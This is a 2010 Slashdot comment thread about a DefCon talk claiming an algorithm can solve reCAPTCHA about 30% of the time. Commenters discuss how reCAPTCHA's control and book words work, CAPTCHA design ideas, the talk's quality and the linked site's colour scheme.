ReCAPTCHA.net Now Vulnerable to Algorithmic Attack

Offtopic by bcmm · 2010-08-05 09:00 · Score: -1, Offtopic

Obvious technical errors in summaries bother me more than spelling/grammar errors.

A Firefox extension is not the same thing as a plugin.

--
# cat /dev/mem | strings | grep -i llama
Damn, my RAM is full of llamas.

Re:Offtopic by stephanruby · 2010-08-05 09:20 · Score: 0, Redundant

A Firefox extension is not the same thing as a plugin.
Firefox plugins ***used*** to be called Firefox extensions. You must just be too young to know this.
Re:Offtopic by Anonymous Coward · 2010-08-05 09:29 · Score: 4, Informative

No, Firefox addons used to be called extensions, plugins are still plugins.
Re:Offtopic by vlueboy · 2010-08-05 09:52 · Score: 1

From TFS:

There's probably an excellent Firefox plugin to render this page's color scheme more bearable.
Halfway through this sentence I realized someone will now implement a nice little extension such that I never again have to answer these recaptchas. Pretty sure they would break this extension shortly with cunning, though. Anyway, at 30% accuracy now, it's easier to <F5> or click refresh 3 or 4 times than to get my hands off the mouse to type 2 word captchas that sometimes are eye-straining.
You don't have to reply here if you don't want to lose karma with such guilty-pleasure extension, brave spammers^Wcoders! :) I'll be googling the currently "virgin" string "captcha this fox" to find your work posted wherever.
Re:Offtopic by Cougar+Town · 2010-08-05 09:59 · Score: 3, Informative

Wrong. Plugins have been around since Netscape and are still called plugins. They have a different function than an extension (and an extension is what we would want in this case to fix the site's colours).
Both plugins and extensions, along with themes, are collectively referred to as "addons." "Plugin" is the wrong word in the summary. "Extension" or "addon" would have been acceptable.
Re:Offtopic by CarpetShark · 2010-08-05 10:36 · Score: 1, Funny

A Firefox extension is not the same thing as a plugin.
Firefox plugins ***used*** to be called Firefox extensions. You must just be too young to know this.
It's a bit like watching scary women fight over who was married to some guy first on Ricky Lake.
Re:Offtopic by easyTree · 2010-08-05 11:27 · Score: 1

Wrong. Plugins have been around since Netscape and are still called plugins. They have a different function than an extension (and divine intervention is what we would want in this case to fix the site's colours).

--
Requiem for the American Dream
Re:Offtopic by MobileTatsu-NJG · 2010-08-05 11:52 · Score: 1

A Firefox extension is not the same thing as a plugin.
B.F.D.

--

"I like to lick butts!" by MobileTatsu-NJG (#32700246) (Score:5, Informative)
Re:Offtopic by Peach+Rings · 2010-08-05 12:42 · Score: 1

reCAPTCHA isn't bad, but Google's captchas are so hard they're probably more easily solved by learning algorithms than actual human beings.
Re:Offtopic by delinear · 2010-08-05 23:45 · Score: 1

The problem is, because they're serving up words that a computer has failed to recognise as part of their OCR project, those same words are often impossible for humans to identify also (maybe they're smudged on the original source for instance) - this does result in some incredibly difficult words to read. According to the powerpoint, you only have to get one word right, I tried this and sometimes it worked, other times it gave me an incorrect result - I think the truth is probably more like (and I'm sure I read once this is how it works) they serve one recognised word and one unrecognised word - the requirement for success is only getting the recognised word right, they just compile the results of the unrecognised word to advance their OCR projects. Usually the recognised word is more readable (because we know it at least started out readable whereas we can't make the same assumption for the unrecognised word), so in the majority of cases so long as you type the word you can read and then make a best guess at the other you will still successfully solve the captcha. Of course, it might still be easier to hit refresh a few times until you get a more readable pair.
Re:Offtopic by Peach+Rings · 2010-08-06 03:00 · Score: 1

Yes that's how it works, and everyone already knows that. I'm not even talking about recaptcha though, I'm talking about the impossible captchas you get when failing too many times to log into a Google account.

My eye's... by Anonymous Coward · 2010-08-05 09:02 · Score: 0

... They bleed nope wait just a shitty color scheme

Re:My eye's... by Anonymous Coward · 2010-08-05 10:12 · Score: 0

Looks fine to me here in the basement..
Re:My eye's... by Peach+Rings · 2010-08-05 12:52 · Score: 4, Funny

You know a hacker is hard core when his site is monochrome in a monospace font, and he saves his files as straight up docx.
Re:My eye's... by Peach+Rings · 2010-08-05 13:08 · Score: 2, Insightful

By the way, that wasn't just a facetious comment. TFA isn't a serious paper. It's not even typeset, just typed into Microsoft Word. And god knows why I'm being warned about VBScript macros when I try to open it.
And this isn't a case where the little guy is making real scientific progress right under the nose of the obsolete establishment. The author doesn't even have a freshman understanding of big-O notation, it's completely juvenile.
Re:My eye's... by hairyfeet · 2010-08-05 13:41 · Score: 5, Funny

You young ones and your complaining. "Ohhh the colors suck" SO WHAT! You don't remember when the Internet was invaded by those dual demons from hell, Geocities and Comet Cursors! Now THAT was torture buddy! YOU try dealing with a page that looks like it was designed by Unicorns on a crack binge, while having a fricking pocketwatch suddenly appear and hang from your cursor like a ball of snot on a string, all while having your shotgunned modems drug down to 300 baud land thanks to a bazillion puke inspiring GIFs spinning all out of time!
Now THAT is real suffering kid! /wanders off muttering/

--
ACs don't waste your time replying, your posts are never seen by me.
Re:My eye's... by Anonymous Coward · 2010-08-05 14:44 · Score: 0

Even more:

I think it looks slick under firefox/linux with the right fonts.
Really great forethought in the web design process right there. Not to mention: Linux, and files in docx and pptx format? Eh?
Not to mention:

I changed the color scheme because you guys apparently can't read black on red for some reason.
What a dick.
Re:My eye's... by Anonymous Coward · 2010-08-05 15:24 · Score: 0

it's presentation materials from defcon, windows generally plays nicer with foreign projectors in a pinch
Re:My eye's... by nicknamesarefunny · 2010-08-05 18:12 · Score: 0

Now that's gone as well. Looks like a very 'live' site....
Re:My eye's... by yuhong · 2010-08-05 18:20 · Score: 1

I downloaded it now and there are no macros, not to mention this is a .docx not a .docm.
Re:My eye's... by Anonymous Coward · 2010-08-05 18:21 · Score: 0

Oh you mean Rainbow Dividers. I get all of my design ideas from them. My sites pop like your eyeballs will if you click the link!
Re:My eye's... by Lavene · 2010-08-05 18:41 · Score: 1

I had such a site on Geocities. Flashing gifs, blink tags, a horrible MIDI playing in the background with no way of turning it of. Blue text on pink background and, naturally, CometCursor.
And of course no meaningful content what so ever.

Innocent times...
Re:My eye's... by Alien1024 · 2010-08-06 03:02 · Score: 1

Not only that, look at the email address - 0xn3on@gmail.com.
D4t b t3h stuff h4x0rz 1z m4d3 0f.
Re:My eye's... by tirnacopu · 2010-08-07 03:09 · Score: 1

Judging by the way you spell "off" or "whatsoever", the grammar mistakes (perhaps "I used to have"?) and how you place your commas, you are still as innocent as they come.

OpenOffice? by Anonymous Coward · 2010-08-05 09:02 · Score: 0

Does the PowerPoint open fine in Keynote?

colours by orange47 · 2010-08-05 09:03 · Score: 2, Funny

"There's probably an excellent Firefox plugin to render this page's color scheme more bearable."
just select all page, its better.

Re:colours by electrostatic · 2010-08-05 09:17 · Score: 4, Informative

"...an excellent Firefox plugin to render this page's color scheme more bearable."

Yep. Color Toggle

https://addons.mozilla.org/en-US/firefox/addon/9408/

I have it set so Ctl-Shift-Z set light yellow background, black text, and blue links.
Re:colours by commodoresloat · 2010-08-05 09:46 · Score: 1

sweet! Perfect for reading slashdot discussions in this IT color scheme! It's hilarious that a slashdot summary in this section is complaining about color schemes on other pages... glass houses and all
Re:colours by Anonymous Coward · 2010-08-05 09:47 · Score: 0

I have it set so Ctl-Shift-Z set light yellow background, black text, and blue links.
I think the intent is to make pages more readable, I don't know what the hell you're doing.
Re:colours by Anonymous Coward · 2010-08-05 09:53 · Score: 1, Informative

Neat, I also use yellow background, black text and bluish links. It is very relaxing.
The color codes are #FFFF00 for the background, #000000 for the text and #00EFFF for the links.
Re:colours by Anonymous Coward · 2010-08-05 09:59 · Score: 1, Informative

View>page style>no style
easy.
Re:colours by SkyDude · 2010-08-05 10:32 · Score: 1

Just hit Ctrl-a and all the text shows up just fine.

--
== First cross river, then insult alligator.
Re:colours by Anonymous Coward · 2010-08-05 11:08 · Score: 0

Do you never Redo?
Re:colours by Anonymous Coward · 2010-08-05 12:37 · Score: 0

Maybe its just me being paranoid but when an AC posts agreeing to a crazy position I always suspect its the original poster
Re:colours by rnturn · 2010-08-05 16:35 · Score: 1

"just select all page, its better."
Ugh. That looks even worse on my browser. I found that "View->Page Style->No Style" worked much better. At least the text was easier to read. And no time was spent searching for an obscure plug-in.

--
CUR ALLOC 20195.....5804M
Re:colours by delinear · 2010-08-05 23:55 · Score: 1

People with one of the most common forms of dyslexia find it easier to read black on yellow (usually soft/light/pastel yellow) - it's high contrast but doesn't have the glare of pure white - just because that colour scheme doesn't sound more readable to you, that doesn't mean it's not more readable to someone.
Re:colours by jonadab · 2010-08-06 02:03 · Score: 1

I haven't browsed with page-specified colors turned on ever since I realized, back in the nineties, that most web content creators have extremely terrible taste in colors. Web pages appear in the system colors (#FFE6BC on #294D4A), same as everything else. That way I can actually stand to look at them.

--
Cut that out, or I will ship you to Norilsk in a box.
Re:colours by commodore64_love · 2010-08-06 03:49 · Score: 1

(1) If white is too glaring, just turn down the brightness on your monitor.
(2) The Black-on-red style reminds me of the 4-color IBM PCs and Apple IIs, circa 1988. Yeah. Nostalgic?!?!?
(3) I cursed the fact I had to downgrade from the beautiful 4000-color Commodore Amiga to a lowly PC or Apple, but that's what the school used, so I was stuck with it. I can't believe those ugly Apples and PCs "won" the computer war. Where did it all go wrong?

--
"I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
Re:colours by Anonymous Coward · 2010-08-06 10:45 · Score: 0

I can't believe those ugly Apples and PCs "won" the computer war. Where did it all go wrong?
When Commodore sat on their laurels for years, let the PC catch up and then surpass it in both capability and price and responded with too little, too late.

Human Success? by Anonymous Coward · 2010-08-05 09:03 · Score: 5, Insightful

So what is the average human success rate? I think mine is only about 50%

Re:Human Success? by Anonymous Coward · 2010-08-05 09:24 · Score: 0

Sometimes I find myself just entering letters and pressing enter to get to the next one.
Re:Human Success? by Anonymous Coward · 2010-08-05 09:52 · Score: 2, Informative

Mine is 100%. Recaptcha is probably one of the easiest captcha I've ever had to deal with; something is wrong with you, sorry.
Re:Human Success? by wickedskaman · 2010-08-05 10:08 · Score: 1

Maybe that's why it's been figured out at ~30% eficacy. *shrug*

--
Sand's overrated... it's just tiny little rocks.
Re:Human Success? by Anonymous Coward · 2010-08-05 10:37 · Score: 0

With reCAPTCHA, you only have to have one of the words right. You can make the other word up. It's usually the least readable one.
Re:Human Success? by artg · 2010-08-05 11:22 · Score: 1

So, is there a firefox plugin that fills in captchas for me ?
Re:Human Success? by Kalriath · 2010-08-05 15:41 · Score: 3, Insightful

Yeah, I agree with this. Recaptcha is one of the easiest out there.
Admittedly though, I have around about 3% success rate with vBulletin captchas. Hear that forum owners? I'm not joining your forum because I can't read your captcha!

--
For a site about things like basic rights, Slashdot users sure do like to censor "dissent".
Re:Human Success? by delinear · 2010-08-06 00:05 · Score: 1

Recaptcha allows you to make some mistakes as standard than most othert captcha solutions I think (and TFA's findings seem to support this also - it suggests you can get one word wrong and one letter from the other word, although when I tested that it was too much, but I have successfully tested one right and one wrong word and still passed the captcha). Really you're being served one captcha word and one word Google's book scanning project couldn't recognise, you're solving the captcha word but the other word (usually the harder word to read) you're only adding to the statistical weighting of what the word probably is, in other words you can afford to be a little wrong and still get the captcha right.

My eyes! by Yvan256 · 2010-08-05 09:04 · Score: 2, Funny

The goggles, they do nothing!

Re:My eyes! by sexconker · 2010-08-05 09:36 · Score: 0, Troll

Did you not learn when I explained this yesterday?
The quote is: "My eyes! The goggles do nothing!".
There is no "they", nor is there any bad pronunciation. Indeed, it is correctly articulated and enunciated, with an accent.
Re:My eyes! by SomeJoel · 2010-08-05 09:40 · Score: 4, Funny

Did you not learn when I explained this yesterday? The quote is: "My eyes! The goggles do nothing!". There is no "they", nor is there any bad pronunciation. Indeed, it is correctly articulated and enunciated, with an accent.
Easy there champ, nobody appreciates a Family Guy nerd correcting everyone's quotes.

--
<Complete your profile by adding a signature!>
Re:My eyes! by Agent0013 · 2010-08-05 10:00 · Score: 1

Unless it's actually a quote from the "Is it a good idea to microwave this" guys on Youtube. (Although I think they actually say the line about the mask and not the goggles.) http://www.youtube.com/watch?v=ewGkH-E_HWA

--

-- ssoorrrryy,, dduupplleexx sswwiittcchh oonn.. -Quote found on actual fortune cookie.
Re:My eyes! by Anonymous Coward · 2010-08-05 10:29 · Score: 0

Except it's from The Simpsons.
http://www.youtube.com/watch?v=OqfOxm_1BE0
Re:My eyes! by sexconker · 2010-08-05 11:05 · Score: 1

Except those guys are simply bastardizing the Simpsons quote.
Re:My eyes! by Anonymous Coward · 2010-08-05 11:23 · Score: -1, Redundant

What about getting the series correct? It was The Simpsons.
Re:My eyes! by billstewart · 2010-08-05 11:39 · Score: 1

Dude, if you're getting old enough to need reading glasses, just get them....
There are some really bad CAPTCHAs out there - recapcha is one of the more human-readable ones, but sometimes just magnification isn't enough.

--

Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
Re:My eyes! by SomeJoel · 2010-08-05 11:53 · Score: 4, Funny

Judging from the other replies, meta-humor is a little hard for you guys...

It works wonders though. For instance, the next time someone is talking about "the force" or jedis and such, tell them "Get a life, Star Trek sucks!". You'll find the reaction much more interesting than if you correctly identify the franchise.

--
<Complete your profile by adding a signature!>
Re:My eyes! by Anonymous Coward · 2010-08-05 13:10 · Score: 0

My eyes! These goggles don't seem to be working correctly!
Re:My eyes! by Anonymous Coward · 2010-08-06 02:05 · Score: 0

Dumbass, "the force" and "jedis" aren't from Star Trek, they're from the old Space 1999 tv series.
Re:My eyes! by Yvan256 · 2010-08-06 06:05 · Score: 1

Did you take the time to check the website linked in the resume? The goggles reference was to that website, not CAPTCHAs.
Re:My eyes! by billstewart · 2010-08-06 12:52 · Score: 1

Yes, it was pretty ugly, but easy to find the link and look at the article..

--

Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks

OCR improvements? by Anonymous Coward · 2010-08-05 09:05 · Score: 3, Interesting

Can these attack algorithms actually increase the accuracy of normal OCR programs?

Re:OCR improvements? by Chad+Birch · 2010-08-05 09:22 · Score: 1

I haven't RTFA, but that's unlikely. With a captcha, you receive a response indicating whether you were correct or not. When using OCR, there isn't really any automated way to be sure if you've gotten it right.

--
Sturgeon was an optimist.
Re:OCR improvements? by nizo · 2010-08-05 09:24 · Score: 1

Better living through spam!

--
I Am My Own Worst Enemy
Re:OCR improvements? by ottothecow · 2010-08-05 09:33 · Score: 1

recaptcha was created to increase the accuracy of normal OCR programs...
so technically the bots solving them would also be helping proof Project Gutenberg texts so long as they are getting both the test word and the book word correct.

--
Bottles.
Re:OCR improvements? by AusIV · 2010-08-05 10:28 · Score: 2, Informative

They're not. I saw the presentation these guys gave at DefCon (their presentation was about as painful as their website), and they're only getting the test word correct with about 30% accuracy. They're not completely sure about their success rates on book words, but they believe it to be considerably lower than the test words.
Re:OCR improvements? by Garble+Snarky · 2010-08-05 10:32 · Score: 1

Unless of course, all the bots use the exact same algorithm, and they all make the same mistake on the book words. Recaptcha uses consensus, right?
Re:OCR improvements? by Peach+Rings · 2010-08-05 12:56 · Score: 1

IIRC, as part of the marblecake time magazine vote thing, people submitted thousands of PENISes as the book word to try to get it inserted randomly into ebooks. The recaptcha people said they've anticipated such an attack and that it's not possible to influence final book word results.
Re:OCR improvements? by Anonymous Coward · 2010-08-05 14:25 · Score: 0

What was so painful about it?
Re:OCR improvements? by n3ond4x · 2010-08-05 14:31 · Score: 2, Funny

They are not considerably lower because as book words are solved they become verification words. Also, if you didn't enjoy my talk, don't come next time.
Re:OCR improvements? by Sparr0 · 2010-08-05 19:44 · Score: 3, Insightful

The problem is that since you are *probably* solving the verification words with higher accuracy to begin with, you are actually poisoning the data being gathered regarding the book words. So, while a book word becoming a verification word based on your "solutions" will keep your solution rate constant, it actually damages the system when it comes time for humans to solve the CAPTCHA, or worse when the solutions are used as OCR corrections.
To clarify, given a classically OCR-able "foo" and a non-OCR-able-but-human-readable "bar", a human is expected to recognize the slightly-deformed-by-reCAPTCHA "foo" and is trusted to get "bar" right more often than OCR would. This attack only defeats the deformation applied by reCAPTCHA, it doesn't actually improve the OCR on the non-deformed words, which means you are going to submit an answer of "foo ban" every time this pair is encounted (or "blah ban" for a different scenario), and the reCAPTCHA system is eventually going to decide that the book word really is "ban".
Re:OCR improvements? by AusIV · 2010-08-06 05:08 · Score: 1

Basically, they had written out a manual for breaking reCAPTCHA, copied their manual into powerpoint slides. Then they stood in front of the audience and read straight from the slides, providing practically nothing we couldn't have gotten just from reading the slides.
On about the third slide, someone in the audience yells out "Are you guys seriously going to just stand up there and read your slides?" And one of the presenters confirmed that they were indeed going to stand up there and read their slides. Half the audience got up and left. If it weren't for my strong personal interest in breaking CAPTCHAs I would have been in the half that left.

Pretty cool stuff by Monkeedude1212 · 2010-08-05 09:07 · Score: 1

But that just means more spambots, right?

Re:Pretty cool stuff by Kepesk · 2010-08-05 09:09 · Score: 1

Personally, I don't think there will ever be an effective CAPTCHA or similar image-based technology. Someone will always come out with a better algorithm to beat them.

--
Help me fix my brother's injured butt!
Re:Pretty cool stuff by fyrewulff · 2010-08-05 09:14 · Score: 1

On the other hand, it'll be easier to block the known spammers because fewer of them will be able to afford the hardware/sweatshop/botnet setups once the computational brute force needed increases.

--
"We need to get over this notion, that, for Apple to win... Microsoft must lose." - Steve Jobs, 1997
Re:Pretty cool stuff by Anonymous Coward · 2010-08-05 09:23 · Score: 1, Insightful

This won't happen. Many current CAPTCHAs are already hard to solve for humans, and increasing the computational cost to solve a CAPTCHA will also make it harder to solve for humans.
Now, the problem is, computers are getting more powerful every day, while humans don't. Sooner or later, this simple fact will render CAPTCHAs useless.
Re:Pretty cool stuff by Anonymous Coward · 2010-08-05 09:24 · Score: 0

If your brain can do it, a computer can be made to do it eventually. CAPTCHA will only block out all robots if it is illegible to human beings as well.
Re:Pretty cool stuff by veganboyjosh · 2010-08-05 09:29 · Score: 1

Useless to humans, maybe.

Maybe not so much to Skynet.
Re:Pretty cool stuff by John+Hasler · 2010-08-05 10:41 · Score: 1

> Maybe not so much to Skynet.
Then we just have to hope the spammers piss off Skynet.

--
Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
Re:Pretty cool stuff by Peach+Rings · 2010-08-05 12:57 · Score: 1

Obviously the evolution of CAPTCHA science will be toward text (or audio) that is more easily recognized by humans but not by bots. It's not just a matter of making captchas really really hard.
Re:Pretty cool stuff by KahabutDieDrake · 2010-08-05 15:40 · Score: 1

This assumes only text CAPTCHA. Iconic based CAPs exist, and are incredibly simple for humans to solve, and very difficult for computers to solve. 4 human face pictures. The question says "which one is smiling?" Now, I realize that even that can be computed, eventually. But the cost is MUCH higher for a computer than for a human. Further, that's the simplest possible example, and hardly encompasses all the possible variations or difficulties. Computers are really good at raw power. They SUCK at pattern recognition (although they are getting better quick) and they REALLY suck at emotional response. The concept of a CAPTCHA is sound, we just need to get away from text based systems. Because as OCR and raw power become more common and more powerful, they won't hold up.
Re:Pretty cool stuff by Anonymous Coward · 2010-08-05 18:05 · Score: 0

However, there are other problems with image-recognition-CAPTCHAs (by wich I mean all the face-, dog-or-cat or similar CAPTCHAs). A good CAPTCHA system should have an abundance of different images or be able to generate them randomly. The latter is not possible for image-recognition CAPTCHAs. The former is very hard. Let's say you have 500.000 images of different faces. Now, the first thing to do for the development team of the CAPTCHA system is process all the images manually to detect whether the person on the image is smiling or not. A single person can probably do that at a rate of 2 images / sec. This means he can process about 72.000 images / day (assuming he works 10h/day). He would roughly need a week to process all the images.
Now, the problem is, the attacker can do the same. As soon as he has identified all the images that are used in the CAPTCHA system, he can solve any CAPTCHA...
Furthermore, it's incredibly hard to get to 500.000 such images in the first place. Even if there was a central system like reCAPTCHA, maybe based on Facebook with millions of images, the problem would be if everyone uses the same CAPTCHA system, there would be an even greater appeal for attackers to break it - and, working together, already a hundred persons working for a month would easily be able to break the complete system.
Re:Pretty cool stuff by delinear · 2010-08-06 00:29 · Score: 1

Yes, centralised captcha would seem eventually destined to failure. The better approach would be that each instance be reasonably unique (even if it was only so far as each users uploading their own images), that way a determined spammer might break one site, but he can't use what he did there to attack others, each time he'll have to start from scratch. The obvious downside is the massive cost - instead of one person spending a week linking images in the database, you'd need one person per company. Still, for a reasonably large company for whom spam is a big issue it might eventually still become the best option (and to periodically add to and remove from the database of existing images).
Re:Pretty cool stuff by david_thornley · 2010-08-06 04:15 · Score: 1

One problem with that is that even the dumbest program has a 25% chance of correctly identifying which of four pictures has a smile, or a kitty, or Yog-Sothoth. If I, as a human, want to get into a website, a 25% success rate is very discouraging. For a robot that doesn't require one particular success, and can try several times, it's quite sufficient.
The critical part of a captcha is that the viewer has to enter the correct one of a very large number of choices. It's really hard to do that with pattern recognition.

--
"When you have eliminated the unacceptable, whatever is left, however improbable, must be the truthiness" - Holmes

Speaking about re-captcha by imsabbel · 2010-08-05 09:08 · Score: 3, Informative

I recently went to their homepage and looked _really_ hard for any statistics about which books are transcriped. I read their Science paper. Tried all sections.
Its all about the captcha part, and _nothing_ about the RE.
The way they state how it works ("We are using 100.000 unique words") sounds like they have given up on that part long ago and just recycle their old database again and again...

--
HI O WISE PRINCE. WHT TOOK U SO DAM LONG?

Re:Speaking about re-captcha by icebraining · 2010-08-05 09:14 · Score: 4, Informative

Currently, we are helping to digitize old editions of the New York Times and books from Google Books.
http://www.google.com/recaptcha/learnmore

--
Dilbert RSS feed
Re:Speaking about re-captcha by Mashiki · 2010-08-05 09:17 · Score: 1

Dunno. I've been seeing a lot of unique stuff recently like hebrew, chinese, japanese, and vertical lettering.

--
Om, nomnomnom...
Re:Speaking about re-captcha by MozeeToby · 2010-08-05 09:28 · Score: 1

You don't even need that, the attacker has access to everything, remember? They can just look at the file directly if it's predownloaded on the page or send the page the mouse over event for that element. I highly doubt that the people doing these algorithms are using a full web browser to pull and post data.
Re:Speaking about re-captcha by imsabbel · 2010-08-05 09:49 · Score: 4, Interesting

Hm.
So its for-profit work for the biggest advertising firm in the world.
Sort of expected project gutenberg or something.
Too bad.

--
HI O WISE PRINCE. WHT TOOK U SO DAM LONG?
Re:Speaking about re-captcha by Cyberax · 2010-08-05 11:32 · Score: 1

As far as I understand, this data will be publicly available on Google Books.
Re:Speaking about re-captcha by al0ha · 2010-08-05 12:02 · Score: 1

>> The way they state how it works ("We are using 100.000 unique words") sounds like they have given up on that part long ago and just recycle their old database again and again...

I think they recycle the database of words that are known, not the ones also proffered up that are unknown to the API, so the book building continues.

Entering the known word gets you past the gate, and once you've done that they assume that you also correctly answered the word they don't know. As far as I understand the unknown word is also offered up more than once to validate against multiple responses. The link below is an interesting outline of how some people figured out the known words were being recycled and exploited it.

http://www.theregister.co.uk/2010/03/01/ticket_scalping_hack/

--
Did you ever wake up in the morning, with a Zombie Woof behind your eyes? -- FZ
Re:Speaking about re-captcha by martin-boundary · 2010-08-05 12:08 · Score: 2, Insightful

Google books isn't really public, though. You can only view a small number of pages of each book, which is pretty useless from the point of view of public uses that come to mind.
Re:Speaking about re-captcha by Cyberax · 2010-08-05 12:12 · Score: 1

Google Books allows you to view and download entire books, if they are in the public domain.
Example:
http://books.google.com/books?id=Q_rLGDGlQz0C&printsec=frontcover&dq=Mark+Twain&hl=en&ei=HlNbTOrmKtWN4gb-q9j3AQ&sa=X&oi=book_result&ct=result&resnum=2&ved=0CCsQ6AEwAQ#v=thumbnail&q&f=false
Re:Speaking about re-captcha by Anonymous Coward · 2010-08-05 12:44 · Score: 0

The word which is being used to write the book is easily identifiable if you do enough reCaptchas. You can replace it with any word you want. Some people already have been, en masse. Google may find itself in a sea of racial slurs if enough people put the same incorrect word intentionally...
Re:Speaking about re-captcha by bill_mcgonigle · 2010-08-05 15:16 · Score: 2, Insightful

So its for-profit work for the biggest advertising firm in the world.
Sort of expected project gutenberg or something.
Google's digitizing hundreds of thousands of historic books from some of the great university libraries. What's the problem here, that they won't lose money on the effort?
The NYT archive has been done for at least a year, it made reCAPTCHA a feasible company.

--
My God, it's Full of Source!
OUTSIDE_IP=$(dig +short my.ip @outsideip.net)
Re:Speaking about re-captcha by extra88 · 2010-08-05 23:29 · Score: 1

I think you're underestimating the public good from what Google provides but even so, the universities get their own copy of the data for their books so they can do even more with it, as copyright allows.
Re:Speaking about re-captcha by jonadab · 2010-08-06 02:11 · Score: 1

> You can only view a small number of pages of each book, which is
> pretty useless from the point of view of public uses that come to mind.

It's useful to the public for the purpose of search -- being able to *find* what you're looking for, even if it's not in the bibliographic data and only appears embedded in the text someplace. I wish the catalog computers at the public library could do that. It brings us one step closer to LCARS.

--
Cut that out, or I will ship you to Norilsk in a box.
Re:Speaking about re-captcha by Anonymous Coward · 2010-08-09 01:09 · Score: 0

Hm.
So its for-profit work for the biggest advertising firm in the world..
Maybe because its owned by the biggest advertising firm in the world?

Can the mouse cursor be positioned by a script? by master_p · 2010-08-05 09:11 · Score: 1

If not, then the captcha should only be visible when the mouse cursor is over it.

The key to a successful captcha is to make it accessible only by a user sitting in front of the screen.

Re:Can the mouse cursor be positioned by a script? by machxor · 2010-08-05 09:18 · Score: 1

It's fairly trivial to use AutoIt to position the mouse and is scriptable.
Re:Can the mouse cursor be positioned by a script? by Lehk228 · 2010-08-05 09:28 · Score: 1

even if it couldn't be done normally, a hostile client could say the cursor is over the script just as easilly as it could place the cursor there.

--
Snowden and Manning are heroes.
Re:Can the mouse cursor be positioned by a script? by Anonymous Coward · 2010-08-05 09:43 · Score: 0

Let me rephrase what you said, and we'll see if you can spot the part where you're thinking like a bloody manager, writing random "security" requirements that are meaningless in practice....
"The key to a successful captcha is to trust the client to detect a user sitting in front of the screen"
Re:Can the mouse cursor be positioned by a script? by Anonymous Coward · 2010-08-05 09:49 · Score: 0

um, people breaking captchas don't actually use browsers. i guess you're just trolling though, nice work.
Re:Can the mouse cursor be positioned by a script? by AusIV · 2010-08-05 10:31 · Score: 1

As a couple of ACs have pointed out, the people breaking CAPTCHAs aren't using browsers, they're using scripts. They don't care if a DOM element is hidden, or if they have to make an extra ajax request of some sort. The scripts will be tailored to the CAPTCHA they're trying to break, and you can't keep a script from getting a hold of something that you plan to show a human.
Re:Can the mouse cursor be positioned by a script? by IBBoard · 2010-08-05 20:09 · Score: 2, Insightful

Remember, iPads and touch-screens can't do hover. Plus there's the whole disability accessibility aspect as well ;)
Re:Can the mouse cursor be positioned by a script? by Anonymous Coward · 2010-08-07 01:32 · Score: 0

You have to think in layers though, at some point a program running (at the application level, kernel level, hypervisor, something) is completely indistinguishable from an actual person in terms of checks like that. The only way for a captcha to work is to provide a problem that can only be solved by a human, i.e. a turing test.

I'm a computer, apparently by El_Muerte_TDS · 2010-08-05 09:11 · Score: 2, Funny

It looks like that tool is better at deciphering the captchas than I am.

Re:I'm a computer, apparently by Anonymous Coward · 2010-08-05 21:27 · Score: 0

Funny?? This should be modded INSIGHTFUL !
(Darn, I can't pass Slashdot's CAPTCHA.)

far from it by MagicM · 2010-08-05 09:12 · Score: 3, Informative

I'm watching the video, and the end result is "b:1/78 1.28% s:27/78 34.62%" indicating that out of 78 tests of two words per test it got a single word right 35% of the time, and both words right only once or 1% of the time.

Since both words need to be correct "solve the current CAPTCHA at an efficacy of 1%" would be closer to the truth.

Re:far from it by NegativeK · 2010-08-05 09:18 · Score: 2, Informative

35% * 35% ~ 12%. And that ignores that one word is a known control, while the other is a word they're trying to OCR.

--
This statement is false.
Re:far from it by BarryJacobsen · 2010-08-05 09:21 · Score: 2, Informative

I'm watching the video, and the end result is "b:1/78 1.28% s:27/78 34.62%" indicating that out of 78 tests of two words per test it got a single word right 35% of the time, and both words right only once or 1% of the time.
Since both words need to be correct "solve the current CAPTCHA at an efficacy of 1%" would be closer to the truth.
My understanding is that only one of the words needs to be correct, but it has to be the "right" one (reCAPTCHA presents two words one it's very certain it knows what it is and one it's less certain, you have to get the one that it's very certain of in order to pass).

--
Track your TV Shows with your iPhone - FREE
Re:far from it by Anonymous Coward · 2010-08-05 09:23 · Score: 0

RTFA, both words don't need to be correct. ReCAPTCHA works by showing you two images, one known and one that OCR cannot currently read. The one OCR cannot read is completely unknown, so if you get it totally wrong, obviously ReCAPTCHA will not know and let you pass anyway.
Re:far from it by Anonymous Coward · 2010-08-05 09:25 · Score: 0

I'm watching the video, and the end result is "b:1/78 1.28% s:27/78 34.62%" indicating that out of 78 tests of two words per test it got a single word right 35% of the time, and both words right only once or 1% of the time.
Since both words need to be correct "solve the current CAPTCHA at an efficacy of 1%" would be closer to the truth.
You are wrong. Only one word needs to be correct. One word is the control word and one is from some book recaptcha is helping to digitize. Learn about recaptcha before going all retard.
Re:far from it by MagicM · 2010-08-05 09:33 · Score: 1

All I'm saying is that just because the algorithm got 30% of the words right doesn't mean that it can "solve the current CAPTCHA at an efficacy of 30%".
Re:far from it by Anonymous Coward · 2010-08-05 09:37 · Score: 0

Learn about recaptcha before going full retard.
FTFY
Re:far from it by MagicM · 2010-08-05 09:39 · Score: 1

Actually I guess that's not what I'm saying, because I said "1%" which was wrong. You may consider my face egged.
Re:far from it by sexconker · 2010-08-05 09:42 · Score: 1

Only ONE word needs to be correct for recaptcha.
There is a known word you are tested against, and an unknown word pulled from a database of shit they scanned.
Solving the known word correctly means you probably also got the unknown word correct. They then pool the "correct" submissions for the unknown words and see what the most common ones are.
I don't know if this is completely automated or if they have an intern monkey clicking "yes" or "no" for unknown words and probable solutions, but the whole "crowd sourcing OCR for a bunch of shit we scanned" is the POINT of recaptcha.
Re:far from it by sexconker · 2010-08-05 09:45 · Score: 1

All I'm saying is that just because the algorithm got 30% of the words right doesn't mean that it can "solve the current CAPTCHA at an efficacy of 30%".
Yes, yes it fucking does.
"Solving" a captcha - to an attacker or a legitimate user - means getting past the damned popup and creating your account, posting your /. obama poop copypasta troll, etc.
Being correct with regards to the OCR means nothing.
Re:far from it by rm999 · 2010-08-05 09:45 · Score: 2, Informative

You are right, there is no need to get both words right.
But, your 35% * 35% calculation assumes the recognition difficulty of the words is independent, which is a bad assumption in this case; the OCR word is one that is known to be hard to guess. It is probably more like 35% * 5% or something.
Re:far from it by IICV · 2010-08-05 09:51 · Score: 1

